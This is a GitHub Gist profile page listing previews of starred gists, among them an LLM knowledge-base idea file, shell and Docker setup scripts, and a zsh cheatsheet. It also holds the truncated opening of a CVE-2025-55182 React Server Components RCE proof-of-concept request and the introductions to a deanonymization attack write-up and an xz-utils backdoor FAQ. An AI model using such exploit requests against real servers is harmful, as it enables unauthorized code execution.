Skip to content

Instantly share code, notes, and snippets.

View hktonylee's full-sized avatar

hktonylee

36 followers · 47 following
View GitHub Profile
@karpathy
karpathy / llm-wiki.md
Created April 4, 2026 16:25
llm-wiki

LLM Wiki

A pattern for building personal knowledge bases using LLMs.

This is an idea file, it is designed to be copy pasted to your own LLM Agent (e.g. OpenAI Codex, Claude Code, OpenCode / Pi, or etc.). Its goal is to communicate the high level idea, but your agent will build out the specifics in collaboration with you.

The core idea

Most people's experience with LLMs and documents looks like RAG: you upload a collection of files, the LLM retrieves relevant chunks at query time, and generates an answer. This works, but the LLM is rediscovering knowledge from scratch on every question. There's no accumulation. Ask a subtle question that requires synthesizing five documents, and the LLM has to find and piece together the relevant fragments every time. Nothing is built up. NotebookLM, ChatGPT file uploads, and most RAG systems work this way.

@maple3142
maple3142 / CVE-2025-55182.http
Last active March 22, 2026 18:14
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@rebane2001
rebane2001 / glass-with-controls.html
Last active April 15, 2026 16:21
glass effect test css/svg thing (messy) - demo: https://codepen.io/rebane2001/details/OPVQXMv
<div style="position:absolute;top:-999px;left:-999px">
<svg
id="effectSvg"
width="200"
height="200"
viewBox="0 0 200 200"
xmlns="http://www.w3.org/2000/svg">
<filter id="displacementFilter4">
@hackermondev
hackermondev / research.md
Last active April 20, 2026 18:59
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

@thesamesam
thesamesam / xz-backdoor.md
Last active April 25, 2026 23:14
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Update: I've disabled comments as of 2025-01-26 to avoid everyone having notifications for something a year on if someone wants to suggest a correction. Folks are free to email to suggest corrections still, of course.

Background

@adtac
adtac / Dockerfile
Last active December 26, 2025 00:20
#!/usr/bin/env docker run
#!/usr/bin/env -S bash -c "docker run -p 8080:8080 -it --rm \$(docker build --progress plain -f \$0 . 2>&1 | tee /dev/stderr | grep -oP 'sha256:[0-9a-f]*')"
# syntax = docker/dockerfile:1.4.0
FROM node:20
WORKDIR /root
RUN npm install sqlite3
@Nexarian
Nexarian / xrdp-nvidia-setup.sh
Last active February 9, 2026 20:36
Setup for XRDP using Nvidia Acceleration
#!/usr/bin/env bash
set -e
cd ~
sudo -v
# Make sure system is in a good, updated, clean, state.
sudo apt-get -y update
@nateraw
nateraw / stable_diffusion_walk.py
Created August 18, 2022 05:59
Walk between stable diffusion text prompts
"""
Built on top of this gist by @karpathy:
https://gist.github.com/karpathy/00103b0037c5aaea32fe1da1af553355
stable diffusion dreaming over text prompts
creates hypnotic moving videos by smoothly walking randomly through the sample space
example way to run this script:
$ python stable_diffusion_walk.py --prompts "['blueberry spaghetti', 'strawberry spaghetti']" --seeds 243,523 --name berry_good_spaghetti
@ClementNerma
ClementNerma / zsh-cheatsheet.md
Last active April 27, 2026 06:16

ZSH CheatSheet

This is a cheat sheet for how to perform various actions to ZSH, which can be tricky to find on the web as the syntax is not intuitive and it is generally not very well-documented.

Strings

Description Syntax
Get the length of a string ${#VARNAME}
Get a single character ${VARNAME[index]}
@pyther
pyther / wsl2_ciscoanyconnect_workaround.md
Last active January 6, 2026 18:05

WSL 2 Cisco AnyConnect Networking Workaround

Overview

WSL 2 uses a Hyper-V Virtual Network adapter. Network connectivity works without any issue when a VPN is not in use. However when a Cisco AnyConnect VPN session is established Firewall Rules and Routes are added which breaks connectivity within the WSL 2 VM. This issue is tracked WSL/issues/4277

Below outline steps to automatically configure the Interface metric on VPN connect and update DNS settings (/etc/resolv.conf) on connect/disconnect.

Manual Configuration

Set Interface Metrics